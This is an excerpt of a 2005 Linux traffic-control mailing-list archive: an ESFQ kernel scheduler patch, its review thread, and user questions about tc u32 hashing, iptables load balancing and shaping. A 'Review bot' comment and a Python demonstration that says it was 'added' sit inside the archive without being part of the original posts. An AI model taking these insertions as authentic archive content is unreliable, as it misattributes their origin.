{ > + sch->bstats.bytes += skb->len; > + sch->bstats.packets++; > + return 0; > + } > + > + esfq_drop(sch); > + return NET_XMIT_CN; > +} > + > +static int > +esfq_requeue(struct sk_buff *skb, struct Qdisc* sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + unsigned hash = esfq_hash(q, skb); > + unsigned depth = q->depth; > + esfq_index x; > + > + x = q->ht[hash]; > + if (x == depth) { > + q->ht[hash] = x = q->dep[depth].next; > + q->hash[x] = hash; > + } > + __skb_queue_head(&q->qs[x], skb); > + esfq_inc(q, x); > + if (q->qs[x].qlen == 1) { /* The flow is new */ > + if (q->tail == depth) { /* It is the first flow */ > + q->tail = x; > + q->next[x] = x; > + q->allot[x] = q->quantum; > + } else { > + q->next[x] = q->next[q->tail]; > + q->next[q->tail] = x; > + q->tail = x; > + } > + } > + if (++sch->q.qlen < q->limit - 1) { > + sch->qstats.requeues++; > + return 0; > + } > + > + sch->qstats.drops++; > + esfq_drop(sch); > + return NET_XMIT_CN; > +} > + > + > + > + > +static struct sk_buff * > +esfq_dequeue(struct Qdisc* sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + struct sk_buff *skb; > + unsigned depth = q->depth; > + esfq_index a, old_a; > + > + /* No active slots */ > + if (q->tail == depth) > + return NULL; > + > + a = old_a = q->next[q->tail]; > + > + /* Grab packet */ > + skb = __skb_dequeue(&q->qs[a]); > + esfq_dec(q, a); > + sch->q.qlen--; > + > + /* Is the slot empty? 
*/ > + if (q->qs[a].qlen == 0) { > + q->ht[q->hash[a]] = depth; > + a = q->next[a]; > + if (a == old_a) { > + q->tail = depth; > + return skb; > + } > + q->next[q->tail] = a; > + q->allot[a] += q->quantum; > + } else if ((q->allot[a] -= skb->len) <= 0) { > + q->tail = a; > + a = q->next[a]; > + q->allot[a] += q->quantum; > + } > + > + return skb; > +} > + > +static void > +esfq_reset(struct Qdisc* sch) > +{ > + struct sk_buff *skb; > + > + while ((skb = esfq_dequeue(sch)) != NULL) > + kfree_skb(skb); > +} > + > +static void esfq_perturbation(unsigned long arg) > +{ > + struct Qdisc *sch = (struct Qdisc*)arg; > + struct esfq_sched_data *q = qdisc_priv(sch); > + > + q->perturbation = net_random()&0x1F; > + q->perturb_timer.expires = jiffies + q->perturb_period; > + > + if (q->perturb_period) { > + q->perturb_timer.expires = jiffies + q->perturb_period; > + add_timer(&q->perturb_timer); > + } > +} > + > +static int esfq_change(struct Qdisc *sch, struct rtattr *opt) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + struct tc_sfq_qopt *ctl = RTA_DATA(opt); > + int old_perturb = q->perturb_period; > + > + if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > + return -EINVAL; > + > + sch_tree_lock(sch); > + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); > + q->perturb_period = ctl->perturb_period*HZ; > +// q->hash_divisor = ctl->divisor; > +// q->tail = q->limit = q->depth = ctl->flows; > + > + if (ctl->limit) > + q->limit = min_t(u32, ctl->limit, q->depth); > + > + if (ctl->hash_kind) { > + q->hash_kind = ctl->hash_kind; > + if (q->hash_kind != TCA_SFQ_HASH_CLASSIC) > + q->perturb_period = 0; > + } > + > + // is sch_tree_lock enough to do this ? 
> + while (sch->q.qlen >= q->limit-1) > + esfq_drop(sch); > + > + if (old_perturb) > + del_timer(&q->perturb_timer); > + if (q->perturb_period) { > + q->perturb_timer.expires = jiffies + q->perturb_period; > + add_timer(&q->perturb_timer); > + } else { > + q->perturbation = 0; > + } > + sch_tree_unlock(sch); > + return 0; > +} > + > +static int esfq_init(struct Qdisc *sch, struct rtattr *opt) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + struct tc_sfq_qopt *ctl; > + esfq_index p = ~0UL/2; > + int i; > + > + if (opt && opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > + return -EINVAL; > + > + init_timer(&q->perturb_timer); > + q->perturb_timer.data = (unsigned long)sch; > + q->perturb_timer.function = esfq_perturbation; > + q->perturbation = 0; > + q->hash_kind = TCA_SFQ_HASH_CLASSIC; > + q->max_depth = 0; > + if (opt == NULL) { > + q->quantum = psched_mtu(sch->dev); > + q->perturb_period = 0; > + q->hash_divisor = 1024; > + q->tail = q->limit = q->depth = 128; > + > + } else { > + ctl = RTA_DATA(opt); > + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); > + q->perturb_period = ctl->perturb_period*HZ; > + q->hash_divisor = ctl->divisor ? : 1024; > + q->tail = q->limit = q->depth = ctl->flows ? 
: 128; > + > + if ( q->depth > p - 1 ) > + return -EINVAL; > + > + if (ctl->limit) > + q->limit = min_t(u32, ctl->limit, q->depth); > + > + if (ctl->hash_kind) { > + q->hash_kind = ctl->hash_kind; > + } > + > + if (q->perturb_period) { > + q->perturb_timer.expires = jiffies + q->perturb_period; > + add_timer(&q->perturb_timer); > + } > + } > + > + q->ht = kmalloc(q->hash_divisor*sizeof(esfq_index), GFP_KERNEL); > + if (!q->ht) > + goto err_case; > + > + q->dep = kmalloc((1+q->depth*2)*sizeof(struct esfq_head), GFP_KERNEL); > + if (!q->dep) > + goto err_case; > + q->next = kmalloc(q->depth*sizeof(esfq_index), GFP_KERNEL); > + if (!q->next) > + goto err_case; > + > + q->allot = kmalloc(q->depth*sizeof(short), GFP_KERNEL); > + if (!q->allot) > + goto err_case; > + q->hash = kmalloc(q->depth*sizeof(unsigned short), GFP_KERNEL); > + if (!q->hash) > + goto err_case; > + q->qs = kmalloc(q->depth*sizeof(struct sk_buff_head), GFP_KERNEL); > + if (!q->qs) > + goto err_case; > + > + for (i=0; i< q->hash_divisor; i++) > + q->ht[i] = q->depth; > + for (i=0; idepth; i++) { > + skb_queue_head_init(&q->qs[i]); > + q->dep[i+q->depth].next = i+q->depth; > + q->dep[i+q->depth].prev = i+q->depth; > + } > + > + for (i=0; idepth; i++) > + esfq_link(q, i); > + return 0; > +err_case: > + if (q->ht) > + kfree(q->ht); > + if (q->dep) > + kfree(q->dep); > + if (q->next) > + kfree(q->next); > + if (q->allot) > + kfree(q->allot); > + if (q->hash) > + kfree(q->hash); > + if (q->qs) > + kfree(q->qs); > + return -ENOBUFS; > +} > + > +static void esfq_destroy(struct Qdisc *sch) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + del_timer(&q->perturb_timer); > + if(q->ht) > + kfree(q->ht); > + if(q->dep) > + kfree(q->dep); > + if(q->next) > + kfree(q->next); > + if(q->allot) > + kfree(q->allot); > + if(q->hash) > + kfree(q->hash); > + if(q->qs) > + kfree(q->qs); > +} > + > +static int esfq_dump(struct Qdisc *sch, struct sk_buff *skb) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + 
unsigned char *b = skb->tail; > + struct tc_sfq_qopt opt; > + > + opt.quantum = q->quantum; > + opt.perturb_period = q->perturb_period/HZ; > + > + opt.limit = q->limit; > + opt.divisor = q->hash_divisor; > + opt.flows = q->depth; > + opt.hash_kind = q->hash_kind; > + > + RTA_PUT(skb, TCA_OPTIONS, sizeof(opt), &opt); > + > + return skb->len; > + > +rtattr_failure: > + skb_trim(skb, b - skb->data); > + return -1; > +} > + > +static struct Qdisc_ops esfq_qdisc_ops = > +{ > + .next = NULL, > + .cl_ops = NULL, > + .id = "esfq", > + .priv_size = sizeof(struct esfq_sched_data), > + .enqueue = esfq_enqueue, > + .dequeue = esfq_dequeue, > + .requeue = esfq_requeue, > + .drop = esfq_drop, > + .init = esfq_init, > + .reset = esfq_reset, > + .destroy = esfq_destroy, > + .change = NULL, /* esfq_change - needs more work */ > + .dump = esfq_dump, > + .owner = THIS_MODULE, > +}; > + > +static int __init esfq_module_init(void) > +{ > + return register_qdisc(&esfq_qdisc_ops); > +} > +static void __exit esfq_module_exit(void) > +{ > + unregister_qdisc(&esfq_qdisc_ops); > +} > +module_init(esfq_module_init) > +module_exit(esfq_module_exit) > +MODULE_LICENSE("GPL"); > > > ------------------------------------------------------------------------ > > Submitted By: Jeremy Utley > Date: 2004-11-04 > Initial Package Version: 2.6.9-041019 > Upstream Status - Not submitted - LFS Specific > Origin: Based on inital work by Jim Gifford, ported to apply to the latest version > Description: Disables compilation of the arpd program, which requres Berkley DB. > > > diff -Naur iproute2-2.6.9/misc/Makefile iproute2-2.6.9-new/misc/Makefile > --- iproute2-2.6.9/misc/Makefile 2004-10-19 20:49:02.000000000 +0000 > +++ iproute2-2.6.9-new/misc/Makefile 2004-11-04 19:14:43.704002010 +0000 > @@ -1,7 +1,7 @@ > SSOBJ=ss.o ssfilter.o > LNSTATOBJ=lnstat.o lnstat_util.o > > -TARGETS=ss nstat ifstat rtacct arpd lnstat > +TARGETS=ss nstat ifstat rtacct lnstat > > include ../Config 
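Review bot: in sch_esfq.c, esfq_init() arms the perturbation timer with add_timer() before any of the kmalloc() calls, but err_case only frees the arrays and returns -ENOBUFS, so a failed allocation leaves a pending timer whose data pointer is this qdisc unless the caller tears it down; either move the add_timer() block below the allocations or call del_timer(&q->perturb_timer) in err_case. The allocation sizes are also taken straight from ctl->flows and ctl->divisor, with `q->depth > p - 1` as the only bound, so an explicit upper limit on both and a power-of-two check on the divisor (the hash is reduced with `h & (q->hash_divisor-1)`) would keep the size arithmetic and bucket selection well defined. Note too that q->hash is an unsigned short array, so a divisor above 65536 would truncate the stored bucket index that is later used in `q->ht[q->hash[a]] = depth`.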
> > @@ -18,9 +18,6 @@ > rtacct: rtacct.c > $(CC) $(CFLAGS) $(LDFLAGS) -o rtacct rtacct.c $(LIBNETLINK) -lm > > -arpd: arpd.c > - $(CC) $(CFLAGS) -I$(DBM_INCLUDE) $(LDFLAGS) -o arpd arpd.c $(LIBNETLINK) -ldb -lpthread > - > ssfilter.c: ssfilter.y > bison ssfilter.y -o ssfilter.c > From tgraf@suug.ch Tue Jan 11 20:38:10 2005 From: tgraf@suug.ch (Thomas Graf) Date: Tue, 11 Jan 2005 21:38:10 +0100 Subject: [LARTC] ESFQ? In-Reply-To: <41E3F088.6060708@dsl.pipex.com> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com> Message-ID: <20050111203810.GE26856@postel.suug.ch> * Andy Furniss <41E3F088.6060708@dsl.pipex.com> 2005-01-11 15:28 > diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h 
> @@ -136,6 +143,7 @@ > __u32 limit; /* Maximal packets in queue */ > unsigned divisor; /* Hash divisor */ > unsigned flows; /* Maximal number of flows */ > + unsigned hash_kind; /* Hash function to use for flow identification */ > }; This breaks compatibility to older iproute2 versions compiled with older header versions (not including the additional 4 octets). sch_sfq.c: if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) return -EINVAL; > +static int esfq_change(struct Qdisc *sch, struct rtattr *opt) > +{ > + struct esfq_sched_data *q = qdisc_priv(sch); > + struct tc_sfq_qopt *ctl = RTA_DATA(opt); > + int old_perturb = q->perturb_period; > + > + if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > + return -EINVAL; > + > + sch_tree_lock(sch); > + q->quantum = ctl->quantum ? : psched_mtu(sch->dev); > + q->perturb_period = ctl->perturb_period*HZ; > +// q->hash_divisor = ctl->divisor; > +// q->tail = q->limit = q->depth = ctl->flows; > + > + if (ctl->limit) > + q->limit = min_t(u32, ctl->limit, q->depth); > + > + if (ctl->hash_kind) { > + q->hash_kind = ctl->hash_kind; > + if (q->hash_kind != TCA_SFQ_HASH_CLASSIC) > + q->perturb_period = 0; > + } > + > + // is sch_tree_lock enough to do this ? > + while (sch->q.qlen >= q->limit-1) > + esfq_drop(sch); > + > + if (old_perturb) > + del_timer(&q->perturb_timer); > + if (q->perturb_period) { > + q->perturb_timer.expires = jiffies + q->perturb_period; > + add_timer(&q->perturb_timer); > + } else { > + q->perturbation = 0; > + } > + sch_tree_unlock(sch); > + return 0; > +} Must be changed to use tcf_exts and ematch api once those patches are merged. I will take care of this. I'll have a closer look later on this week. From andy.furniss@dsl.pipex.com Tue Jan 11 23:06:27 2005 
From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 11 Jan 2005 23:06:27 +0000 Subject: [LARTC] ESFQ? In-Reply-To: <20050111203810.GE26856@postel.suug.ch> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com> <20050111203810.GE26856@postel.suug.ch> Message-ID: <41E45BF3.1040208@dsl.pipex.com> Thomas Graf wrote: > * Andy Furniss <41E3F088.6060708@dsl.pipex.com> 2005-01-11 15:28 > >>diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h 
>>@@ -136,6 +143,7 @@ >> __u32 limit; /* Maximal packets in queue */ >> unsigned divisor; /* Hash divisor */ >> unsigned flows; /* Maximal number of flows */ >>+ unsigned hash_kind; /* Hash function to use for flow identification */ >> }; > > > This breaks compatibility to older iproute2 versions > compiled with older header versions (not including > the additional 4 octets). sch_sfq.c: > > if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > return -EINVAL; I did wonder if it could just come out now that iproute2 uses its own pkt_sched.h. Just to be sure I understand - it's a risk that always existed eg. before Stephen maintained iproute2, when it compiled against kernel headers. If I patched kernel and failed to compile new tc/had old tc ahead in path etc. then sfq would be broken. So if you patch make sure you build and use new tc do tc -V / check you don't have an old one in /sbin as iproute2's make install uses /usr/sbin by default. > >>+static int esfq_change(struct Qdisc *sch, struct rtattr *opt) >>+{ >>+ struct esfq_sched_data *q = qdisc_priv(sch); >>+ struct tc_sfq_qopt *ctl = RTA_DATA(opt); >>+ int old_perturb = q->perturb_period; >>+ >>+ if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) >>+ return -EINVAL; >>+ >>+ sch_tree_lock(sch); >>+ q->quantum = ctl->quantum ? : psched_mtu(sch->dev); >>+ q->perturb_period = ctl->perturb_period*HZ; >>+// q->hash_divisor = ctl->divisor; >>+// q->tail = q->limit = q->depth = ctl->flows; >>+ >>+ if (ctl->limit) >>+ q->limit = min_t(u32, ctl->limit, q->depth); >>+ >>+ if (ctl->hash_kind) { >>+ q->hash_kind = ctl->hash_kind; >>+ if (q->hash_kind != TCA_SFQ_HASH_CLASSIC) >>+ q->perturb_period = 0; >>+ } >>+ >>+ // is sch_tree_lock enough to do this ? 
>>+ while (sch->q.qlen >= q->limit-1) >>+ esfq_drop(sch); >>+ >>+ if (old_perturb) >>+ del_timer(&q->perturb_timer); >>+ if (q->perturb_period) { >>+ q->perturb_timer.expires = jiffies + q->perturb_period; >>+ add_timer(&q->perturb_timer); >>+ } else { >>+ q->perturbation = 0; >>+ } >>+ sch_tree_unlock(sch); >>+ return 0; >>+} > > > Must be changed to use tcf_exts and ematch api once those patches > are merged. I will take care of this. > > I'll have a closer look later on this week. > Thanks. Andy. From shemminger@osdl.org Wed Jan 12 00:21:10 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Tue, 11 Jan 2005 16:21:10 -0800 Subject: [LARTC] ESFQ? In-Reply-To: <41E45BF3.1040208@dsl.pipex.com> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com> <20050111203810.GE26856@postel.suug.ch> <41E45BF3.1040208@dsl.pipex.com> Message-ID: <20050111162110.36391739@dxpl.pdx.osdl.net> On Tue, 11 Jan 2005 23:06:27 +0000 Andy Furniss wrote: > Thomas Graf wrote: > > * Andy Furniss <41E3F088.6060708@dsl.pipex.com> 2005-01-11 15:28 > > > >>diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h 
> >>@@ -136,6 +143,7 @@ > >> __u32 limit; /* Maximal packets in queue */ > >> unsigned divisor; /* Hash divisor */ > >> unsigned flows; /* Maximal number of flows */ > >>+ unsigned hash_kind; /* Hash function to use for flow identification */ > >> }; > > > > > > This breaks compatibility to older iproute2 versions > > compiled with older header versions (not including > > the additional 4 octets). sch_sfq.c: > > > > if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) > > return -EINVAL; > > I did wonder if it could just come out now that iproute2 uses its own > pkt_sched.h. > > Just to be sure I understand - it's a risk that always existed eg. > before Stephen maintained iproute2, when it compiled against kernel > headers. If I patched kernel and failed to compile new tc/had old tc > ahead in path etc. then sfq would be broken. > > So if you patch make sure you build and use new tc do tc -V / check you > don't have an old one in /sbin as iproute2's make install uses /usr/sbin > by default. > We need to maintain binary compatibility so that old command with latest kernel, and new command works with old kernel. That restricts message formats. But not source compatibility for iproute2, the iproute2 package needs to be self-contained and not depend on external (kernel) headers that may or may not be up to date. Also, older version of iproute2 compiled with current kernel headers should be supported. I would rather see all versions of iproute2 tarball's as self contained and not depend on kernel headers. From andy.furniss@dsl.pipex.com Wed Jan 12 01:08:42 2005 
From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 12 Jan 2005 01:08:42 +0000 Subject: [LARTC] ESFQ? In-Reply-To: <20050111162110.36391739@dxpl.pdx.osdl.net> References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za> <41E3F088.6060708@dsl.pipex.com> <20050111203810.GE26856@postel.suug.ch> <41E45BF3.1040208@dsl.pipex.com> <20050111162110.36391739@dxpl.pdx.osdl.net> Message-ID: <41E4789A.2060301@dsl.pipex.com> Stephen Hemminger wrote: > On Tue, 11 Jan 2005 23:06:27 +0000 > Andy Furniss wrote: > > >>Thomas Graf wrote: >> >>>* Andy Furniss <41E3F088.6060708@dsl.pipex.com> 2005-01-11 15:28 >>> >>> >>>>diff -urN linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h 
>>>>@@ -136,6 +143,7 @@ >>>> __u32 limit; /* Maximal packets in queue */ >>>> unsigned divisor; /* Hash divisor */ >>>> unsigned flows; /* Maximal number of flows */ >>>>+ unsigned hash_kind; /* Hash function to use for flow identification */ >>>>}; >>> >>> >>>This breaks compatibility to older iproute2 versions >>>compiled with older header versions (not including >>>the additional 4 octets). sch_sfq.c: >>> >>> if (opt->rta_len < RTA_LENGTH(sizeof(*ctl))) >>> return -EINVAL; >> >>I did wonder if it could just come out now that iproute2 uses its own >>pkt_sched.h. >> >>Just to be sure I understand - it's a risk that always existed eg. >>before Stephen maintained iproute2, when it compiled against kernel >>headers. If I patched kernel and failed to compile new tc/had old tc >>ahead in path etc. then sfq would be broken. >> >>So if you patch make sure you build and use new tc do tc -V / check you >>don't have an old one in /sbin as iproute2's make install uses /usr/sbin >>by default. >> > > > We need to maintain binary compatibility so that old command with latest > kernel, and new command works with old kernel. That restricts message formats. > > But not source compatibility for iproute2, the iproute2 package needs to be self-contained > and not depend on external (kernel) headers that may or may not be up to date. > > Also, older version of iproute2 compiled with current kernel headers > should be supported. I would rather see all versions of iproute2 tarball's > as self contained and not depend on kernel headers. > Ahh - I think I see what you mean. If esfq wants to get into kernel then it has to become a completly new queue and not mess with sfq options at all. Andy. From justin@expertron.co.za Wed Jan 12 10:57:39 2005 
From: justin@expertron.co.za (Justin Schoeman)
Date: Wed, 12 Jan 2005 12:57:39 +0200
Subject: [LARTC] GeoIP?
Message-ID: <41E502A3.1010405@expertron.co.za>

Hi all,

does anybody know what happened to GeoIP (www.geoip.net)? It seems I just get an empty page if I try to go to the site now...

Thanks,
Justin

From andy.furniss@dsl.pipex.com Wed Jan 12 11:10:49 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Wed, 12 Jan 2005 11:10:49 +0000
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
In-Reply-To: <1483.192.168.1.2.1105403313@maild.mine.nu>
References: <1483.192.168.1.2.1105403313@maild.mine.nu>
Message-ID: <41E505B9.9060700@dsl.pipex.com>

junk@maild.mine.nu wrote:
> I am still looking for a solution to this problem.......
>
>>junk@maild.mine.nu wrote:
>>
>>>Hi,
>>>Yes I did give this a try a couple of times before with no success
>>>
>>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK
>>>--set-mark 0x2
>>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK
>>>--set-mark 0x1
>>>
>>> ip rule :
>>>0: from all lookup local
>>>201: from all fwmark 0x2 lookup 202
>>>201: from all fwmark 0x1 lookup 201
>>>32766: from all lookup main
>>>ip route show table 202
>>>default via 212.199.28.244 dev ppp1 proto static src 80.178.89.120
>>>ip route show table 201
>>>default via 212.199.26.111 dev ppp0 proto static src 84.94.148.214
>>>ip route show table main
>>>212.199.26.111 dev ppp0 proto kernel scope link src 84.94.148.214
>>>212.199.28.244 dev ppp1 proto kernel scope link src 80.178.89.120
>>>default proto static equalize
>>> nexthop via 212.199.26.111 dev ppp0 weight 1
>>> nexthop via 212.199.28.244 dev ppp1 weight 1
>>
>>
>>
>>I must admit I am more into tc than ip so I've never tried it.
>>
>>My guess is that you need to get rid of equalize/weights as these load
>>balance per connection and the routes get cached.
>>
>>Andy.

More things I would try - mark in postrouting, snat to the address of downlink you want return to use. Get rid of the src addresses in in tables.

Andy.

From andy.furniss@dsl.pipex.com Wed Jan 12 11:36:32 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Wed, 12 Jan 2005 11:36:32 +0000
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
In-Reply-To: <41E505B9.9060700@dsl.pipex.com>
References: <1483.192.168.1.2.1105403313@maild.mine.nu> <41E505B9.9060700@dsl.pipex.com>
Message-ID: <41E50BC0.7010705@dsl.pipex.com>

Andy Furniss wrote:
> mark in postrouting,

Oops - I mean mark in forward as well as output - do snat in postrouting nat table.

Andy.

From ashling.odriscoll@cit.ie Wed Jan 12 12:18:09 2005
From: ashling.odriscoll@cit.ie (Ashling O'Driscoll)
Date: Wed, 12 Jan 2005 12:18:09 -0000
Subject: [LARTC] dynamic bandwidth allocation
Message-ID: <380-2200513121218967@cit.ie>

Hi,

Hope someone can help me. I am a student who has been given a project to develop a dynamic bandwidth service. I currently have a linux router which at the moment gives users static bandwidth and assigns each of them to a bucket. I have not gotten information yet as to whether each bucket is serviced in a round robin fashion or whether certain buckets get preferential treatment (i.e. bucket 1 service 60% as opposed to bucket 2 40%).

I need to implement dynamic bandwidth/traffic shaping based on certain types of traffic/applications e.g. voice or based on particular users. So basically if voice traffic is being delayed and not getting through, the bandwidth should be dynamically adjusted to accommodate this and then readjusted once the problem is resolved.

I have researched the iproute 2 package, tc, packet priorities, tos bytes, queues etc the last few days but I am actually confused at this stage by all the information. I have also come across a scripting tool called "pacemaker" from st josephs university in america which seems "close" to what I want but not quite it.

If anyone could offer me advice on how I should approach this, whether it's "do-able" and an estimation of what kind of task I'm undertaking i.e. how difficult and how much time this might take, I would be VERY grateful. As I have not worked in industry before and am not very familiar with linux, I don't know how possible/difficult this project is or even how to approach it.

Thanks in advance,
Aisling.

From valton@ipko.net Wed Jan 12 12:27:18 2005
From: valton@ipko.net (Valton Hashani)
Date: Wed, 12 Jan 2005 13:27:18 +0100
Subject: [LARTC] hashing filters
Message-ID: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z>

Hi all,
I am a newbie and I have not played a lot with tc utility. I have read maybe everything that has to do with massive filtering (maybe not everything). If you can help me on this I would appreciate that very much. I use tc utility with iproute2-ss040831.
I want to limit bandwidth for the 192.168.0.0/16 subnet using this script.

tc qdisc del dev eth0 root
tc qdisc add dev eth0 root handle 1: htb
tc class add dev eth0 parent 1: classid 1:2 htb rate 100Mbit ceil 100MBit
tc filter add dev eth0 parent 1:2 handle 2: protocol ip u32 divisor 256
tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/16 hashkey mask 0x000000ff at 12 link 2:
tc class add dev eth0 parent 1:2 classid 1:3 htb rate 128Kbit ceil 128Kbit

j=0;

while [ $j -le 254 ]
do
        i=0;

        while [ $i -le 254 ]
        do
                hexi=`echo "obase=16; $i" | bc`
                tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3
                i=$((i+1))
        done

        j=$((j+1))
done

somewhere at 192.168.8.7/32 it appears on the screen this message

RTNETLINK answers: File exists
We have an error talking to the kernel

Can you tell me please what am I doing wrong.

Thank you in advance
Valton
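How the `hashkey mask 0x000000ff at 12 link 2:` rule in the script above chooses a bucket of table 2:, compared with the same rule reading offset 16, as an added Python example (not part of the original post). The bucket model (masked 32-bit word, shifted down to the mask's lowest set bit, reduced with divisor-1) is a simplification assumed for illustration, the helper names are hypothetical, and the packets are constructed samples.

```python
import ipaddress
import struct

SRC_OFFSET = 12        # byte offset of the source address in an IPv4 header
DST_OFFSET = 16        # byte offset of the destination address
HASH_MASK = 0x000000FF  # "hashkey mask 0x000000ff" from the script
DIVISOR = 256           # "u32 divisor 256" from the script


def ipv4_header(src, dst, proto=6):
    """Build a minimal 20-byte IPv4 header (constructed sample, checksum 0)."""
    return struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20, 0, 0, 64, proto, 0,
        ipaddress.IPv4Address(src).packed,
        ipaddress.IPv4Address(dst).packed,
    )


def bucket(header, at, mask=HASH_MASK, divisor=DIVISOR):
    """Simplified model of u32 bucket selection (assumption, not kernel code):
    read the 32-bit word at byte offset `at`, apply the mask, shift down to
    the mask's lowest set bit and reduce with divisor-1."""
    (word,) = struct.unpack_from("!I", header, at)
    shift = (mask & -mask).bit_length() - 1
    return ((word & mask) >> shift) & (divisor - 1)


def build_buckets():
    """Mirror the script's nested loop: the rule for 192.168.j.i is stored
    in bucket i of table 2:, for j and i in 0..254."""
    table = {i: set() for i in range(DIVISOR)}
    for j in range(255):
        for i in range(255):
            table[i].add((192 << 24) | (168 << 16) | (j << 8) | i)
    return table


def classify(header, at, table):
    """Return the flowid reached when the link rule hashes at offset `at`,
    or None when no rule in the selected bucket matches the destination."""
    (dst,) = struct.unpack_from("!I", header, DST_OFFSET)
    return "1:3" if dst in table[bucket(header, at)] else None


def demo():
    """Classify two constructed packets with the key taken at 12 and at 16."""
    table = build_buckets()
    samples = [
        ("10.1.2.77", "192.168.8.7"),  # source and destination end differently
        ("10.0.0.7", "192.168.8.7"),   # last octets happen to coincide
    ]
    rows = []
    for src, dst in samples:
        hdr = ipv4_header(src, dst)
        rows.append((
            src, dst,
            bucket(hdr, SRC_OFFSET), classify(hdr, SRC_OFFSET, table),
            bucket(hdr, DST_OFFSET), classify(hdr, DST_OFFSET, table),
        ))
    return rows


if __name__ == "__main__":
    for src, dst, b12, f12, b16, f16 in demo():
        print(f"{src} -> {dst}: at 12 bucket {b12} flowid {f12}; "
              f"at 16 bucket {b16} flowid {f16}")
```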
From tomasz.paszkowski@e-wro.pl Wed Jan 12 13:11:21 2005
From: tomasz.paszkowski@e-wro.pl (Tomasz Paszkowski)
Date: Wed, 12 Jan 2005 14:11:21 +0100
Subject: [LARTC] hashing filters
In-Reply-To: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z>
References: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z>
Message-ID: <20050112131121.GA5641@krezus.e-wro.net>

On Wed, Jan 12, 2005 at 01:27:18PM +0100, Valton Hashani wrote:
> Hi all,
> I am a newbie and I have not played a lot with tc utility. I have read maybe everything that has to do with massive filtering (maybe not everything). If you can help me on this I would appreciate that very much. I use tc utility with iproute2-ss040831.
> I want to limit bandwidth for the 192.168.0.0/16 subnet using this script.
>
>
> tc qdisc del dev eth0 root
> tc qdisc add dev eth0 root handle 1: htb
> tc class add dev eth0 parent 1: classid 1:2 htb rate 100Mbit ceil 100MBit
> tc filter add dev eth0 parent 1:2 handle 2: protocol ip u32 divisor 256
> tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/16 hashkey mask 0x000000ff at 12 link 2:

change to:
tc filter add dev eth0 protocol ip parent 1: u32 match ip dst 192.168.0.0/24 hashkey mask 0x000000ff at 16 link 2:

> tc class add dev eth0 parent 1:2 classid 1:3 htb rate 128Kbit ceil 128Kbit
>
> j=0;
>
> while [ $j -le 254 ]
>
> do
> i=0;
>
> while [ $i -le 254 ]
> do
> hexi=`echo "obase=16; $i" | bc`

add here:
echo tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3
and show us results.
> tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3
> i=$((i+1))
> done
>
> j=$((j+1))
> done
>
> somewhere at 192.168.8.7/32 it appears on the screen this message
>
> RTNETLINK answers: File exists
> We have an error talking to the kernel
>
> Can you tell me please what am I doing wrong.

--
Tomasz Paszkowski

From TechSupport@sqliaison.com Wed Jan 12 13:48:24 2005
From: TechSupport@sqliaison.com (TechSupport)
Date: Wed, 12 Jan 2005 08:48:24 -0500
Subject: [LARTC] Good pratice with a Linux Gateway / Traffic Shapping
Message-ID:

Hi,
I am the network administrator of my company, I know quite well Windows networking and a few about Linux and its amazing routing and QOS capabilities.
Right now, we have a burstable T1, which means that the bill increases with our T1 use.
I have decided to find a way to shape the traffic so I can stay at a reasonable speed of 256 kb/s (Up/down) on my T1.
I have linux gateway with 2 nics behind a PIX firewall.
Right now, the gateway and the pix are configured in a way so I can have a network segment inside my internal network.
The Linux version is suse PRO 9.2
My questions are (yes, they are several questions)
